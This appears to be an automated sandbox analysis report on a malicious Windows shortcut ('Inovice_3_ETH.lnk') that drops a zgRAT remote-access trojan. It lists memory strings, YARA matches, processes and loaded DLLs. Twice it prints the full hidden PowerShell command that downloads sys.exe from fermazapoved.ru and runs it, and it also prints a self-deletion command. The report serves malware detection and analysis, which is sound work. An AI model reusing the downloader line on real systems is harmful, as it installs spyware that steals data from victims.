                    Source: powershell.exe, 00000000.00000002.1746913988.000001F3D98E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1766056749.000001F3E7F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1766056749.000001F3E80C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383269147.0000018211613000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383269147.0000018211755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: cert9.db.2.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: cert9.db.2.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: powershell.exe, 00000006.00000002.2202470656.00000182017D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000000.00000002.1746913988.000001F3D7F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2202470656.00000182015A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000006.00000002.2202470656.00000182017D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: svhosts.exe, 00000002.00000002.2290132290.000000001C350000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/DotNetZip
                    Source: powershell.exe, 00000000.00000002.1770301966.000001F3F0130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: cert9.db.2.drString found in binary or memory: http://x1.c.lencr.org/0
                    Source: cert9.db.2.drString found in binary or memory: http://x1.i.lencr.org/0
                    Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: powershell.exe, 00000000.00000002.1746913988.000001F3D7F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2202470656.00000182015A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
                    Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: powershell.exe, 00000006.00000002.2383269147.0000018211755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000006.00000002.2383269147.0000018211755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000006.00000002.2383269147.0000018211755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: powershell.exe, 00000000.00000002.1746913988.000001F3D9527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fermazapoved.ru
                    Source: powershell.exe, 00000000.00000002.1746913988.000001F3D9527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fermazapoved.ru/images/sys.exe
                    Source: powershell.exe, 00000006.00000002.2202470656.00000182017D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: powershell.exe, 00000000.00000002.1746913988.000001F3D9079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2202470656.00000182021D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000000.00000002.1746913988.000001F3D98E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1766056749.000001F3E7F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1766056749.000001F3E80C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383269147.0000018211613000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383269147.0000018211755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: Djqfxpxi.tmpdb.2.drString found in binary or memory: https://support.mozilla.org
                    Source: Djqfxpxi.tmpdb.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: Djqfxpxi.tmpdb.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                    Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, Zgsqkqrt.tmpdb.2.dr, Erwtzpbb.tmpdb.2.dr, Oibwdoubon.tmpdb.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: Zgsqkqrt.tmpdb.2.dr, Erwtzpbb.tmpdb.2.dr, Oibwdoubon.tmpdb.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, Zgsqkqrt.tmpdb.2.dr, Erwtzpbb.tmpdb.2.dr, Oibwdoubon.tmpdb.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: Zgsqkqrt.tmpdb.2.dr, Erwtzpbb.tmpdb.2.dr, Oibwdoubon.tmpdb.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: Djqfxpxi.tmpdb.2.drString found in binary or memory: https://www.mozilla.org
                    Source: Djqfxpxi.tmpdb.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: Djqfxpxi.tmpdb.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: Djqfxpxi.tmpdb.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: Djqfxpxi.tmpdb.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: Djqfxpxi.tmpdb.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownHTTPS traffic detected: 62.173.145.78:443 -> 192.168.2.4:49731 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to capture screen (.Net source)
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, hu5jtJKG1agB7FrDKI3.cs.Net Code: z2TKaC5YIM
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 2.2.svhosts.exe.1bd80000.5.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\svhosts.exeJump to dropped file
                    Windows shortcut file (LNK) contains suspicious command line arguments
                    Source: Inovice_3_ETH.lnkLNK file: -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','%APPDATA%\svhosts.exe');Start-Process '%APPDATA%\svhosts.exe'
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9B8A0E9E2_2_00007FFD9B8A0E9E
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9B8A04D02_2_00007FFD9B8A04D0
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9B8A11E62_2_00007FFD9B8A11E6
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9B8A11892_2_00007FFD9B8A1189
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9B960F042_2_00007FFD9B960F04
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9B9639402_2_00007FFD9B963940
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9B965FEB2_2_00007FFD9B965FEB
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9B9656F12_2_00007FFD9B9656F1
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA23C0D2_2_00007FFD9BA23C0D
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA1AB402_2_00007FFD9BA1AB40
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA133432_2_00007FFD9BA13343
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA3B9702_2_00007FFD9BA3B970
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA230E72_2_00007FFD9BA230E7
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA1C7982_2_00007FFD9BA1C798
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA1AE602_2_00007FFD9BA1AE60
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA396002_2_00007FFD9BA39600
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA1AC352_2_00007FFD9BA1AC35
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA169D32_2_00007FFD9BA169D3
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA15F802_2_00007FFD9BA15F80
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA15FD82_2_00007FFD9BA15FD8
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA1E7BD2_2_00007FFD9BA1E7BD
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA1E7C02_2_00007FFD9BA1E7C0
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA1E6482_2_00007FFD9BA1E648
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA1DD902_2_00007FFD9BA1DD90
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA1DD652_2_00007FFD9BA1DD65
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA395482_2_00007FFD9BA39548
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9BA19C632_2_00007FFD9BA19C63
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 2.2.svhosts.exe.1bd80000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: svhosts.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 2.2.svhosts.exe.1c350000.6.raw.unpack, WinZipAesCipherStream.csCryptographic APIs: 'TransformBlock'
                    Source: 2.2.svhosts.exe.1c350000.6.raw.unpack, WinZipAesCipherStream.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.svhosts.exe.1c350000.6.raw.unpack, WinZipAesCipherStream.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, EjD3KIZhYgXxF43EgY5.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, cLxg1VivqXKPVdAKiHb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, cLxg1VivqXKPVdAKiHb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, RdxPeP7Eax71XOM6ZsE.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, RdxPeP7Eax71XOM6ZsE.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, RdxPeP7Eax71XOM6ZsE.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, RUyZge7gYG34YLmgatn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winLNK@7/29@2/2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\svhosts.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeMutant created: \Sessions\1\BaseNamedObjects\c8f0949f2f3d443d
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eczr0fqn.rw3.ps1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: Eqnllogrj.tmpdb.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Inovice_3_ETH.lnkReversingLabs: Detection: 70%
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\svhosts.exe "C:\Users\user\AppData\Roaming\svhosts.exe"
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" Start-Sleep -Seconds 10; Remove-Item -Path 'C:\Users\user\AppData\Roaming\svhosts.exe' -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\svhosts.exe "C:\Users\user\AppData\Roaming\svhosts.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" Start-Sleep -Seconds 10; Remove-Item -Path 'C:\Users\user\AppData\Roaming\svhosts.exe' -ForceJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: kernel.appcore.dllJump to behavior
